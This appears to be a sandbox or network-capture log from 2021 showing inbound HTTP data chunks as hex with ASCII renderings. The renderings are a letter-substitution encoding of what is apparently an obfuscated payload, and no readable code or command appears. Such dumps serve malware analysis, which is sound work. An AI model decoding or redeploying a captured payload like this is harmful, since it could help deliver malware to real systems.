                                                                                                2021-10-26 15:35:11 UTC1709INData Raw: 54 53 4f 20 54 54 4d 20 50 54 20 6e 6e 20 69 50 20 50 69 20 55 69 20 54 54 55 20 54 53 67 20 54 53 69 20 54 4d 54 20 67 50 20 50 4d 20 67 6e 20 54 54 53 20 4d 53 70 20 54 54 20 6e 54 20 54 53 4f 20 54 54 4d 20 50 54 20 70 50 20 53 20 50 69 20 55 69 20 54 54 50 20 55 20 54 54 50 20 54 54 4d 20 50 53 20 50 4d 20 67 4d 20 50 54 20 4f 67 20 4f 4f 20 54 54 67 20 54 54 6e 20 69 53 20 54 70 55 20 70 55 20 54 50 67 20 50 69 20 55 69 20 54 54 50 20 55 20 6e 6e 20 54 54 4d 20 50 53 20 50 4d 20 67 4d 20 50 54 20 4f 67 20 4f 4f 20 54 54 67 20 54 54 70 20 69 53 20 54 70 55 20 70 55 20 50 70 20 50 69 20 55 69 20 54 53 50 20 55 20 6e 4f 20 54 54 4d 20 50 53 20 50 4d 20 67 4d 20 50 54 20 6e 53 20 54 54 4f 20 54 69 20 6e 4f 20 54 54 4d 20 50 53 20 50 4d 20 4d 70 20 55 70
                                                                                                Data Ascii: TSO TTM PT nn iP Pi Ui TTU TSg TSi TMT gP PM gn TTS MSp TT nT TSO TTM PT pP S Pi Ui TTP U TTP TTM PS PM gM PT Og OO TTg TTn iS TpU pU TPg Pi Ui TTP U nn TTM PS PM gM PT Og OO TTg TTp iS TpU pU Pp Pi Ui TSP U nO TTM PS PM gM PT nS TTO Ti nO TTM PS PM Mp Up
                                                                                                2021-10-26 15:35:11 UTC1711INData Raw: 50 4f 20 6e 50 20 67 50 20 50 69 20 55 69 20 54 54 55 20 4d 69 4f 20 67 6e 20 54 54 4d 20 50 53 20 69 4f 20 4f 67 20 54 53 4f 20 55 69 20 54 54 69 20 54 4d 6e 20 54 53 54 20 54 4d 54 20 6e 67 20 70 67 20 50 53 20 50 69 20 55 53 20 4d 50 69 20 6e 54 20 54 53 4f 20 54 54 4d 20 50 54 20 4f 50 20 54 53 50 20 50 69 20 55 69 20 54 4d 53 20 54 4d 50 20 54 53 53 20 54 54 20 67 69 20 69 55 20 50 53 20 50 53 20 50 4f 20 69 54 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 50 55 20 50 6e 20 6e 67 20 67 6e 20 55 69 20 54 54 69 20 54 54 67 20 4d 20 69 67 20 50 53 20 69 55 20 50 70 20 67 70 20 55 54 20 4f 53 20 4d 67 20 54 53 4f 20 54 54 4d 20 50 70 20 4d 4f 20 54 50 67 20 4d 67 4d 20 4f 53 20 4f 70 20 54 54 4d 20 54 69 6e 20 54 53 4d 20 70 53 20 69 55 20 50 53 20 69 50 20 50
                                                                                                Data Ascii: PO nP gP Pi Ui TTU MiO gn TTM PS iO Og TSO Ui TTi TMn TST TMT ng pg PS Pi US MPi nT TSO TTM PT OP TSP Pi Ui TMS TMP TSS TT gi iU PS PS PO iT TTn TSO TMM PU Pn ng gn Ui TTi TTg M ig PS iU Pp gp UT OS Mg TSO TTM Pp MO TPg MgM OS Op TTM Tin TSM pS iU PS iP P
                                                                                                2021-10-26 15:35:11 UTC1712INData Raw: 4f 20 54 54 4d 20 50 53 20 4d 4d 20 70 50 20 4d 69 70 20 55 69 20 54 54 69 20 54 4d 6e 20 54 54 55 20 6e 69 20 54 69 70 20 69 55 20 50 53 20 50 69 20 54 54 69 20 54 20 54 4f 20 54 53 4f 20 54 54 4d 20 50 70 20 69 53 20 55 20 54 70 55 20 55 69 20 54 54 69 20 54 54 6e 20 6e 50 20 54 53 53 20 4d 53 69 20 50 69 20 54 69 70 20 50 69 20 55 69 20 54 54 70 20 70 20 70 4f 20 54 54 4d 20 50 53 20 50 69 20 70 50 20 4f 70 20 55 69 20 54 54 69 20 54 54 50 20 4d 67 6e 20 6e 50 20 50 53 20 69 55 20 50 69 20 67 69 20 54 6e 53 20 54 54 70 20 4d 54 4d 20 54 53 4f 20 54 54 4d 20 50 4d 20 70 6e 20 4d 70 20 50 69 20 55 69 20 54 54 70 20 70 20 50 4f 20 54 54 4d 20 50 53 20 50 69 20 54 6e 55 20 54 53 20 55 69 20 54 54 69 20 54 54 67 20 54 4f 20 70 70 20 50 53 20 69 55 20 50 69
                                                                                                Data Ascii: O TTM PS MM pP Mip Ui TTi TMn TTU ni Tip iU PS Pi TTi T TO TSO TTM Pp iS U TpU Ui TTi TTn nP TSS MSi Pi Tip Pi Ui TTp p pO TTM PS Pi pP Op Ui TTi TTP Mgn nP PS iU Pi gi TnS TTp MTM TSO TTM PM pn Mp Pi Ui TTp p PO TTM PS Pi TnU TS Ui TTi TTg TO pp PS iU Pi
                                                                                                2021-10-26 15:35:11 UTC1713INData Raw: 4d 20 6e 55 20 54 53 4f 20 54 54 4d 20 50 69 20 54 70 20 4d 67 50 20 4d 53 20 54 67 4d 20 54 53 55 20 4f 67 20 54 69 70 20 54 54 4d 20 50 53 20 50 69 20 6e 70 20 54 55 67 20 55 69 20 54 54 69 20 54 54 67 20 4d 4d 50 20 70 4d 20 50 53 20 69 55 20 50 54 20 55 4f 20 54 4d 20 54 54 69 20 54 54 6e 20 54 53 6e 20 4f 53 20 50 53 20 69 55 20 69 4f 20 70 20 55 6e 20 54 54 69 20 4d 54 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 69 20 55 69 20 55 4d 20 54 55 69 20 6e 4f 20 54 70 53 20 69 69 20 4d 69 20 4d 53 50 20 50 69 20 55 69 20 54 54 70 20 54 53 4f 20 70 69 20 6e 55 20 4d 53 20 6e 55 20 6e 6e 20 50 69 20 55 69 20 54 54 55 20 54 54 20 4d 67 6e 20 54 54 4d 20 50 53 20 50 4d 20 4d 70 20 54 50 55 20 55 69 20 54 54 69 20 54 4d 6e 20 54 54 70 20 4f 67 20
                                                                                                Data Ascii: M nU TSO TTM Pi Tp MgP MS TgM TSU Og Tip TTM PS Pi np TUg Ui TTi TTg MMP pM PS iU PT UO TM TTi TTn TSn OS PS iU iO p Un TTi MT TSO TTM PS iU PS Pi Ui UM TUi nO TpS ii Mi MSP Pi Ui TTp TSO pi nU MS nU nn Pi Ui TTU TT Mgn TTM PS PM Mp TPU Ui TTi TMn TTp Og
                                                                                                2021-10-26 15:35:11 UTC1715INData Raw: 54 54 50 20 54 54 6e 20 54 53 6e 20 4f 6e 20 50 69 20 67 67 20 50 69 20 55 4f 20 54 50 6e 20 54 54 69 20 54 54 6e 20 54 53 67 20 67 54 20 4d 69 55 20 69 55 20 50 53 20 70 53 20 6e 54 20 54 4d 67 20 54 53 53 20 54 53 53 20 55 55 20 4d 50 20 69 4f 20 50 53 20 69 55 20 6e 54 20 54 54 6e 20 54 53 53 20 54 53 70 20 4f 6e 20 50 4d 20 54 6e 53 20 6e 50 20 54 4d 4d 20 55 69 20 54 54 69 20 54 54 70 20 4d 55 20 70 53 20 50 53 20 69 55 20 50 54 20 67 67 20 54 67 20 54 53 54 20 69 50 20 4d 4d 69 20 4d 20 50 53 20 69 55 20 50 54 20 67 6e 20 4f 4d 20 4f 4f 20 54 54 50 20 54 4d 4d 20 69 53 20 67 67 20 50 69 20 67 50 20 69 4f 20 70 4f 20 54 54 70 20 54 53 53 20 54 53 54 20 54 53 4d 20 67 50 20 50 70 20 54 55 55 20 54 4d 4f 20 54 4d 69 20 54 4f 53 20 54 54 6e 20 54 53 4f
                                                                                                Data Ascii: TTP TTn TSn On Pi gg Pi UO TPn TTi TTn TSg gT MiU iU PS pS nT TMg TSS TSS UU MP iO PS iU nT TTn TSS TSp On PM TnS nP TMM Ui TTi TTp MU pS PS iU PT gg Tg TST iP MMi M PS iU PT gn OM OO TTP TMM iS gg Pi gP iO pO TTp TSS TST TSM gP Pp TUU TMO TMi TOS TTn TSO
                                                                                                2021-10-26 15:35:11 UTC1716INData Raw: 54 54 6e 20 54 53 4f 20 54 54 70 20 4d 50 20 4d 67 55 20 67 4d 20 50 50 20 54 6e 53 20 54 53 67 20 54 53 54 20 54 53 4f 20 54 54 4d 20 69 55 20 67 69 20 50 54 20 50 4d 20 55 4d 20 4d 67 4d 20 54 4d 20 67 6e 20 54 54 4d 20 50 53 20 69 4f 20 70 6e 20 54 4d 70 20 55 69 20 54 54 69 20 54 54 70 20 54 70 20 54 54 54 20 50 53 20 69 55 20 50 69 20 67 70 20 55 50 20 54 54 4d 20 54 54 50 20 54 4d 4d 20 69 53 20 54 70 55 20 6e 67 20 53 20 50 69 20 55 69 20 54 54 50 20 69 20 4f 50 20 54 54 4d 20 50 53 20 69 4f 20 6e 4f 20 69 53 20 55 69 20 54 54 69 20 54 54 67 20 54 4d 6e 20 54 54 67 20 69 55 20 50 69 20 69 4d 20 54 54 53 20 4d 53 70 20 70 20 4d 4d 4d 20 54 53 4f 20 54 54 4d 20 50 54 20 6e 6e 20 54 55 20 50 69 20 55 69 20 54 54 55 20 54 53 67 20 54 53 55 20 54 54 69
                                                                                                Data Ascii: TTn TSO TTp MP MgU gM PP TnS TSg TST TSO TTM iU gi PT PM UM MgM TM gn TTM PS iO pn TMp Ui TTi TTp Tp TTT PS iU Pi gp UP TTM TTP TMM iS TpU ng S Pi Ui TTP i OP TTM PS iO nO iS Ui TTi TTg TMn TTg iU Pi iM TTS MSp p MMM TSO TTM PT nn TU Pi Ui TTU TSg TSU TTi
                                                                                                2021-10-26 15:35:11 UTC1717INData Raw: 54 20 54 70 54 20 54 53 4f 20 54 54 4d 20 50 70 20 69 53 20 67 54 20 54 20 54 54 69 20 54 20 54 70 53 20 54 53 4f 20 54 54 4d 20 50 70 20 69 50 20 67 54 20 6e 20 54 54 69 20 54 54 70 20 54 4d 50 20 54 54 69 20 4f 70 20 4f 67 20 4d 67 53 20 50 53 20 50 69 20 4f 69 20 4d 4f 20 54 70 4d 20 54 53 4f 20 54 54 4d 20 50 70 20 50 69 20 50 55 20 69 54 20 70 55 20 4d 4f 20 54 70 67 20 54 53 4f 20 54 54 4d 20 50 70 20 4f 50 20 4d 67 69 20 50 69 20 55 69 20 54 4d 53 20 54 54 50 20 4d 20 54 70 4f 20 50 53 20 69 55 20 50 70 20 50 4d 20 70 70 20 54 54 4d 20 4d 50 54 20 4d 54 55 20 67 54 20 4d 67 4d 20 69 55 20 50 53 20 70 53 20 54 4d 70 20 54 4d 70 20 4f 69 20 54 6e 53 20 54 4d 4d 20 4d 50 20 4d 50 67 20 69 54 20 70 20 55 6e 20 54 54 69 20 4d 20 54 53 4f 20 54 54 4d 20
                                                                                                Data Ascii: T TpT TSO TTM Pp iS gT T TTi T TpS TSO TTM Pp iP gT n TTi TTp TMP TTi Op Og MgS PS Pi Oi MO TpM TSO TTM Pp Pi PU iT pU MO Tpg TSO TTM Pp OP Mgi Pi Ui TMS TTP M TpO PS iU Pp PM pp TTM MPT MTU gT MgM iU PS pS TMp TMp Oi TnS TMM MP MPg iT p Un TTi M TSO TTM
                                                                                                2021-10-26 15:35:11 UTC1719INData Raw: 20 54 53 4f 20 70 69 20 54 54 53 20 4d 53 20 50 69 20 4d 70 20 4d 54 50 20 55 69 20 54 54 69 20 54 4d 6e 20 4d 20 54 69 70 20 50 53 20 69 55 20 50 70 20 69 55 20 54 54 70 20 54 53 69 20 55 6e 20 54 55 4f 20 54 54 53 20 4d 70 20 4d 53 6e 20 50 53 20 50 69 20 55 4d 20 4d 4f 20 54 50 53 20 54 53 4f 20 54 54 4d 20 50 70 20 4d 6e 20 69 4f 20 70 53 20 54 4d 6e 20 54 69 70 20 54 54 50 20 70 4f 20 54 69 55 20 50 53 20 69 55 20 50 70 20 54 70 20 54 4d 69 20 4d 50 53 20 54 54 6e 20 54 53 4f 20 54 54 55 20 4d 67 70 20 4d 53 20 4d 67 20 67 53 20 4d 69 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 53 70 20 67 54 20 69 53 20 4d 53 20 69 4f 20 54 54 70 20 54 54 70 20 55 6e 20 54 55 4f 20 54 54 53 20 4d 70 20 4d 53 6e 20 50 53 20 50 69 20 55 4d 20 4f 53 20 54 4f 67 20 54 53
                                                                                                Data Ascii: TSO pi TTS MS Pi Mp MTP Ui TTi TMn M Tip PS iU Pp iU TTp TSi Un TUO TTS Mp MSn PS Pi UM MO TPS TSO TTM Pp Mn iO pS TMn Tip TTP pO TiU PS iU Pp Tp TMi MPS TTn TSO TTU Mgp MS Mg gS Mi TTi TTn TSg TSp gT iS MS iO TTp TTp Un TUO TTS Mp MSn PS Pi UM OS TOg TS
                                                                                                2021-10-26 15:35:11 UTC1720INData Raw: 54 6e 20 54 53 67 20 54 4d 54 20 54 55 20 67 4d 20 4d 54 20 50 69 20 55 69 20 4f 53 20 4d 69 55 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 4d 20 4d 50 20 54 53 4d 20 69 4d 20 54 67 20 54 54 6e 20 54 53 4f 20 54 54 70 20 67 67 20 50 4d 20 4d 70 20 4d 67 67 20 55 69 20 54 54 69 20 54 4d 6e 20 54 53 6e 20 54 53 50 20 4d 70 20 4d 54 50 20 50 53 20 50 69 20 4f 69 20 4f 69 20 4f 70 20 54 4d 69 20 54 54 70 20 54 55 20 4d 69 4f 20 54 6e 20 4d 67 53 20 6e 69 20 4f 53 20 54 67 55 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 69 20 4d 54 4f 20 50 69 20 55 69 20 54 4d 53 20 54 53 4d 20 54 53 50 20 4f 54 20 67 67 20 4d 69 20 4d 67 6e 20 50 69 20 55 69 20 54 4d 53 20 4f 67 20 4d 67 4f 20 54 54 4d 20 50 53 20 50 69 20 69 67 20 67 53 20 54 6e 4f 20 54 54 69 20 54 54 6e 20 54 53 67
                                                                                                Data Ascii: Tn TSg TMT TU gM MT Pi Ui OS MiU TSO TTM PM MM MP TSM iM Tg TTn TSO TTp gg PM Mp Mgg Ui TTi TMn TSn TSP Mp MTP PS Pi Oi Oi Op TMi TTp TU MiO Tn MgS ni OS TgU TSO TTM PM Mi MTO Pi Ui TMS TSM TSP OT gg Mi Mgn Pi Ui TMS Og MgO TTM PS Pi ig gS TnO TTi TTn TSg
                                                                                                2021-10-26 15:35:11 UTC1721INData Raw: 20 55 67 20 4f 53 20 53 20 54 53 4f 20 54 54 4d 20 50 70 20 4d 55 20 50 6e 20 4d 4f 20 55 6e 20 54 4d 54 20 4f 69 20 54 50 55 20 54 69 20 54 4f 67 20 69 55 20 50 53 20 70 53 20 54 4d 70 20 4f 70 20 54 54 4f 20 54 53 70 20 55 55 20 4d 4d 69 20 69 55 20 50 53 20 70 53 20 4f 4d 20 55 55 20 54 54 6e 20 54 53 4f 20 54 53 6e 20 4d 20 50 54 20 50 53 20 4f 70 20 55 69 20 54 54 69 20 54 54 6e 20 55 70 20 54 54 4d 20 50 53 20 67 67 20 69 50 20 69 69 20 54 4d 69 20 54 6e 4f 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 70 54 20 69 55 20 4d 53 69 20 67 4d 20 4d 55 20 54 54 69 20 54 54 6e 20 54 53 55 20 67 54 20 54 53 67 20 69 55 20 50 53 20 70 53 20 50 4f 20 54 67 69 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 4d 70 20 54 50 4d 20 50 53 20 50 69 20 4f 69 20 54 53 53 20 55 4f 20
                                                                                                Data Ascii: Ug OS S TSO TTM Pp MU Pn MO Un TMT Oi TPU Ti TOg iU PS pS TMp Op TTO TSp UU MMi iU PS pS OM UU TTn TSO TSn M PT PS Op Ui TTi TTn Up TTM PS gg iP ii TMi TnO TTn TSO TMM pT iU MSi gM MU TTi TTn TSU gT TSg iU PS pS PO Tgi TTn TSO TMM Mp TPM PS Pi Oi TSS UO
                                                                                                2021-10-26 15:35:11 UTC1723INData Raw: 50 20 50 69 20 55 69 20 54 54 70 20 4f 67 20 4d 54 6e 20 54 54 4d 20 50 53 20 50 69 20 4d 70 20 55 6e 20 55 69 20 54 54 69 20 54 4d 6e 20 54 6e 4f 20 54 54 4d 20 67 55 20 4d 70 20 50 4d 20 4d 55 20 55 50 20 4f 55 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 4d 67 20 50 53 20 4d 54 20 67 53 20 54 54 69 20 54 53 6e 20 69 67 20 54 54 4d 20 50 53 20 69 4f 20 69 54 20 70 20 55 6e 20 54 54 69 20 70 4d 20 54 53 4f 20 54 54 4d 20 50 53 20 54 69 20 50 53 20 50 69 20 70 4f 20 54 4d 20 55 20 54 53 4f 20 54 54 4d 20 50 69 20 54 70 20 4d 4d 70 20 54 55 20 54 67 4d 20 54 53 55 20 4f 67 20 54 69 70 20 54 54 4d 20 50 53 20 50 69 20 4d 70 20 54 50 55 20 55 69 20 54 54 69 20 54 4d 6e 20 54 54 55 20 4f 67 20 69 4f 20 4d 4d 20 4d 50 20 50 67 20 4f 69 20 55 4f 20 54 54 6e
                                                                                                Data Ascii: P Pi Ui TTp Og MTn TTM PS Pi Mp Un Ui TTi TMn TnO TTM gU Mp PM MU UP OU TTn TSO TTM PS Mg PS MT gS TTi TSn ig TTM PS iO iT p Un TTi pM TSO TTM PS Ti PS Pi pO TM U TSO TTM Pi Tp MMp TU TgM TSU Og Tip TTM PS Pi Mp TPU Ui TTi TMn TTU Og iO MM MP Pg Oi UO TTn
                                                                                                2021-10-26 15:35:11 UTC1724INData Raw: 20 67 54 20 69 69 20 54 54 69 20 54 4d 20 4d 69 69 20 54 53 4f 20 54 54 4d 20 50 69 20 69 6e 20 69 6e 20 67 70 20 55 69 20 54 53 69 20 4f 67 20 54 70 6e 20 54 54 4d 20 50 53 20 50 69 20 69 4d 20 4d 6e 20 4f 69 20 55 69 20 54 54 69 20 54 4d 67 20 4f 69 20 67 20 4d 6e 20 50 4d 20 70 53 20 54 4d 6e 20 54 50 53 20 54 4d 70 20 6e 53 20 54 67 4d 20 54 55 20 54 55 54 20 4d 4d 20 4d 67 53 20 6e 69 20 4f 53 20 54 67 55 20 54 53 4f 20 54 54 4d 20 50 4d 20 50 50 20 54 4f 53 20 54 4d 4d 20 55 69 20 54 54 69 20 54 54 70 20 70 4f 20 69 69 20 50 53 20 69 55 20 50 70 20 70 4f 20 67 4d 20 54 54 69 20 54 54 6e 20 54 53 67 20 55 53 20 54 4d 53 20 4d 53 20 4d 4d 70 20 69 53 20 54 4d 69 20 54 69 54 20 54 54 6e 20 54 53 4f 20 54 54 55 20 4d 70 20 54 67 4d 20 50 53 20 50 69 20
                                                                                                Data Ascii: gT ii TTi TM Mii TSO TTM Pi in in gp Ui TSi Og Tpn TTM PS Pi iM Mn Oi Ui TTi TMg Oi g Mn PM pS TMn TPS TMp nS TgM TU TUT MM MgS ni OS TgU TSO TTM PM PP TOS TMM Ui TTi TTp pO ii PS iU Pp pO gM TTi TTn TSg US TMS MS MMp iS TMi TiT TTn TSO TTU Mp TgM PS Pi
                                                                                                2021-10-26 15:35:11 UTC1725INData Raw: 20 4d 53 54 20 55 69 20 54 54 69 20 54 54 50 20 54 54 54 20 4f 6e 20 50 69 20 4d 69 20 54 50 4f 20 50 69 20 55 69 20 54 4d 53 20 54 53 69 20 70 69 20 70 4f 20 4d 53 20 67 67 20 50 69 20 50 67 20 54 4d 69 20 54 69 4d 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 54 55 20 4d 4d 55 20 4d 67 20 4d 67 53 20 6e 69 20 4f 53 20 54 67 55 20 54 53 4f 20 54 54 4d 20 50 4d 20 50 50 20 4d 70 20 54 70 70 20 55 69 20 54 54 69 20 54 54 50 20 54 4d 53 20 4f 67 20 69 70 20 4d 4d 20 50 55 20 67 53 20 54 6e 70 20 54 54 69 20 54 54 6e 20 54 53 67 20 4f 4f 20 50 50 20 67 67 20 50 50 20 50 53 20 50 4f 20 54 4d 4d 20 54 54 70 20 54 53 4f 20 54 4d 4d 20 67 53 20 67 4f 20 4d 50 20 70 53 20 6e 54 20 54 54 55 20 4f 69 20 4d 54 4f 20 54 4d 67 20 4d 50 20 4d 69 4f 20 70 4d 20 4d 4f 20 54 55
                                                                                                Data Ascii: MST Ui TTi TTP TTT On Pi Mi TPO Pi Ui TMS TSi pi pO MS gg Pi Pg TMi TiM TTn TSO TMM TU MMU Mg MgS ni OS TgU TSO TTM PM PP Mp Tpp Ui TTi TTP TMS Og ip MM PU gS Tnp TTi TTn TSg OO PP gg PP PS PO TMM TTp TSO TMM gS gO MP pS nT TTU Oi MTO TMg MP MiO pM MO TU
                                                                                                2021-10-26 15:35:11 UTC1727INData Raw: 55 20 54 4d 70 20 69 55 20 50 53 20 70 53 20 6e 54 20 54 54 4f 20 54 53 53 20 54 53 69 20 55 53 20 54 50 69 20 4d 54 20 4d 4d 70 20 69 53 20 54 4d 69 20 54 69 54 20 54 54 6e 20 54 53 4f 20 54 54 55 20 4d 70 20 54 67 4d 20 50 53 20 50 69 20 55 4d 20 4f 53 20 4d 53 20 54 53 4f 20 54 54 4d 20 50 70 20 4d 67 55 20 50 53 20 67 4d 20 54 4d 70 20 54 54 70 20 4f 50 20 6e 4d 20 54 54 67 20 67 69 20 69 55 20 50 53 20 50 69 20 55 69 20 54 54 69 20 54 54 6e 20 50 55 20 67 4f 20 50 53 20 54 70 20 54 54 70 20 50 69 20 55 69 20 54 54 50 20 54 53 4d 20 4f 67 20 54 54 50 20 50 53 20 4d 54 20 50 53 20 50 69 20 55 69 20 69 4f 20 54 54 6e 20 54 53 4f 20 4f 6e 20 69 55 20 50 54 20 70 50 20 70 54 20 55 50 20 54 54 69 20 54 4d 6e 20 54 54 4d 20 4f 67 20 69 4d 20 4d 4d 20 50 67
                                                                                                Data Ascii: U TMp iU PS pS nT TTO TSS TSi US TPi MT MMp iS TMi TiT TTn TSO TTU Mp TgM PS Pi UM OS MS TSO TTM Pp MgU PS gM TMp TTp OP nM TTg gi iU PS Pi Ui TTi TTn PU gO PS Tp TTp Pi Ui TTP TSM Og TTP PS MT PS Pi Ui iO TTn TSO On iU PT pP pT UP TTi TMn TTM Og iM MM Pg
                                                                                                2021-10-26 15:35:11 UTC1728INData Raw: 4d 4d 20 50 67 20 4d 4d 20 69 70 20 55 6e 20 54 70 50 20 54 54 50 20 55 55 20 4d 53 50 20 69 55 20 50 53 20 69 55 20 54 4d 69 20 54 4f 55 20 54 54 6e 20 54 53 4f 20 54 54 55 20 4d 70 20 55 54 20 50 53 20 50 69 20 4f 69 20 54 6e 4d 20 54 54 55 20 54 53 4d 20 4f 54 20 4d 54 4d 20 4d 70 20 50 53 20 50 50 20 70 55 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 55 55 20 4f 4d 20 55 69 20 55 70 20 50 54 20 54 53 4f 20 54 54 4d 20 50 54 20 69 67 20 4d 20 50 53 20 55 69 20 4d 67 67 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 54 54 70 20 69 55 20 50 53 20 67 4f 20 69 4d 20 4f 70 20 54 54 70 20 54 53 4f 20 54 4d 4d 20 6e 70 20 67 54 20 50 53 20 50 69 20 55 53 20 54 53 54 20 4d 70 20 54 4d 55 20 54 54 4d 20 50 53 20 50 55 20 69 4d 20 4d 6e 20 70 4f
                                                                                                Data Ascii: MM Pg MM ip Un TpP TTP UU MSP iU PS iU TMi TOU TTn TSO TTU Mp UT PS Pi Oi TnM TTU TSM OT MTM Mp PS PP pU TTi TTn TSO TTM PS iU UU OM Ui Up PT TSO TTM PT ig M PS Ui Mgg TTn TSO TTM TTp iU PS gO iM Op TTp TSO TMM np gT PS Pi US TST Mp TMU TTM PS PU iM Mn pO
                                                                                                2021-10-26 15:35:11 UTC1729INData Raw: 54 20 69 67 20 4d 20 50 53 20 55 69 20 4d 67 67 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 54 54 70 20 69 55 20 50 53 20 67 4f 20 69 4d 20 54 50 55 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 6e 70 20 67 54 20 50 53 20 50 69 20 55 53 20 54 53 54 20 4d 70 20 54 4d 55 20 54 54 4d 20 50 53 20 50 55 20 67 70 20 4d 70 20 70 4f 20 55 69 20 54 54 50 20 54 4f 20 54 50 20 50 53 20 69 55 20 50 69 20 67 69 20 50 4f 20 54 50 70 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 67 53 20 67 4d 20 4d 50 20 50 67 20 4f 69 20 55 4f 20 54 50 4d 20 54 53 6e 20 54 69 20 6e 6e 20 69 55 20 50 53 20 50 53 20 50 4f 20 54 53 4d 20 54 54 70 20 54 53 4f 20 54 4d 4d 20 4d 67 70 20 4d 53 20 4d 67 20 67 53 20 4d 69 20 54 54 69 20 54 54 6e 20 54 53 67 20 54 53 55 20 67 54 20 69 53 20 4d 53 20 69 4f 20 54
                                                                                                Data Ascii: T ig M PS Ui Mgg TTn TSO TTM TTp iU PS gO iM TPU TTn TSO TMM np gT PS Pi US TST Mp TMU TTM PS PU gp Mp pO Ui TTP TO TP PS iU Pi gi PO TPp TTn TSO TMM gS gM MP Pg Oi UO TPM TSn Ti nn iU PS PS PO TSM TTp TSO TMM Mgp MS Mg gS Mi TTi TTn TSg TSU gT iS MS iO T
                                                                                                2021-10-26 15:35:11 UTC1731INData Raw: 20 53 20 50 69 20 50 69 20 69 4f 20 54 54 69 20 54 54 6e 20 54 53 4f 20 54 54 4d 20 50 53 20 69 55 20 50 53 20 50 4d 20 70 70 20 54 53 54 20 55 55 20 54 4d 6e 20 55 70 20 54 55 20 54 4f 50 20 4d 53 20 4d 67 53 20 6e 69 20 4f 53 20 54 67 55 20 54 53 4f 20 54 54 4d 20 50 4d 20 4d 69 20 54 67 69 20 50 69 20 55 69 20 54 54 70 20 54 6e 54 20 4f 55 20 55 70 20 4d 50 20 4d 4d 53 20 4d 70 20 54 4d 4d 20 55 69 20 54 54 69 20 54 4d 6e 20 70 4f 20 54 6e 20 50 53 20 69 55 20 50 70 20 4d 67 4d 20 55 69 20 54 54 4d 20 54 53 55 20 54 4d 53 20 4f 67 20 50 55 20 4d 4d 20 4d 70 20 54 6e 4d 20 55 69 20 54 54 69 20 54 54 50 20 6e 53 20 54 54 50 20 4d 53 20 4d 6e 20 54 4f 70 20 67 53 20 4d 67 20 54 54 50 20 54 54 6e 20 54 53 6e 20 55 55 20 4d 67 70 20 69 55 20 50 53 20 70 53
                                                                                                Data Ascii: S Pi Pi iO TTi TTn TSO TTM PS iU PS PM pp TST UU TMn Up TU TOP MS MgS ni OS TgU TSO TTM PM Mi Tgi Pi Ui TTp TnT OU Up MP MMS Mp TMM Ui TTi TMn pO Tn PS iU Pp MgM Ui TTM TSU TMS Og PU MM Mp TnM Ui TTi TTP nS TTP MS Mn TOp gS Mg TTP TTn TSn UU Mgp iU PS pS
                                                                                                2021-10-26 15:35:11 UTC1732INData Raw: 4d 54 4f 20 50 53 20 69 55 20 50 54 20 4d 55 20 4f 50 20 55 4f 20 54 4d 4f 20 54 54 55 20 70 69 20 50 69 20 69 55 20 54 4d 69 20 50 69 20 55 69 20 54 54 69 20 6e 50 20 54 53 4f 20 54 54 4d 20 67 50 20 6e 55 20 6e 70 20 50 69 20 55 69 20 54 54 55 20 54 54 4f 20 6e 6e 20 4d 4d 50 20 4d 53 20 4d 4d 69 20 69 69 20 67 53 20 54 6e 54 20 54 54 69 20 54 54 6e 20 54 53 6e 20 55 55 20 4d 54 4f 20 69 55 20 50 53 20 70 53 20 54 4d 69 20 4d 54 55 20 54 54 6e 20 54 53 4f 20 54 4d 4d 20 69 69 20 4d 4f 20 50 4f 20 54 70 20 55 4d 20 4f 53 20 54 4d 6e 20 54 53 55 20 54 54 4d 20 50 70 20 4d 67 55 20 4d 54 20 70 53 20 54 4d 6e 20 54 67 50 20 55 53 20 70 4f 20 70 53 20 50 53 20 69 55 20 50 70 20 69 69 20 54 4d 54 20 54 53 70 20 55 67 20 54 53 70 20 55 53 20 54 70 55 20 4d 4d
                                                                                                Data Ascii: MTO PS iU PT MU OP UO TMO TTU pi Pi iU TMi Pi Ui TTi nP TSO TTM gP nU np Pi Ui TTU TTO nn MMP MS MMi ii gS TnT TTi TTn TSn UU MTO iU PS pS TMi MTU TTn TSO TMM ii MO PO Tp UM OS TMn TSU TTM Pp MgU MT pS TMn TgP US pO pS PS iU Pp ii TMT TSp Ug TSp US TpU MM
                                                                                                2021-10-26 15:35:11 UTC1733INData Raw: 20 4f 69 20 55 4f 20 54 50 50 20 54 4f 20 50 55 20 50 53 20 69 55 20 50 69 20 69 55 20 50 4f 20 54 53 55 20 54 54 70 20 54 53 4f 20 54 4d 4d 20 67 70 20 67 4f 20 67 54 20 50 67 20 54 54 69 20 55 4f 20 54 54 55 20 54 53 4d 20 4f 54 20 50 53 20 50 53 20 54 55 20 54 54 6e 20 54 54 69 20 54 70 4d 20 54 53 6e 20 70 4f 20 54 69 67 20 50 53 20 69 55 20 50 4d 20 69 4f 20 54 4d 69 20 54 53 4f 20 54 54 70 20 54 53 4f 20 54 4d 4d 20 4f 67 20 4d 54 70 20 50 53 20 50 69 20 4f 69 20 54 4d 53 20 54 54 20 67 4f 20 54 54 4d 20 50 53 20 50 4d 20 50 4d 20 55 4f 20 6e 67 20 54 54 50 20 54 54 6e 20 54 53 67 20 4f 67 20 50 6e 20 6e 55 20 54 4d 53 20 50 69 20 55 69 20 54 54 55 20 54 54 50 20 4d 20 54 54 53 20 50 54 20 69 55 20 50 70 20 69 4f 20 70 6e 20 69 4d 20 54 4d 70 20 54
                                                                                                Data Ascii: Oi UO TPP TO PU PS iU Pi iU PO TSU TTp TSO TMM gp gO gT Pg TTi UO TTU TSM OT PS PS TU TTn TTi TpM TSn pO Tig PS iU PM iO TMi TSO TTp TSO TMM Og MTp PS Pi Oi TMS TT gO TTM PS PM PM UO ng TTP TTn TSg Og Pn nU TMS Pi Ui TTU TTP M TTS PT iU Pp iO pn iM TMp T
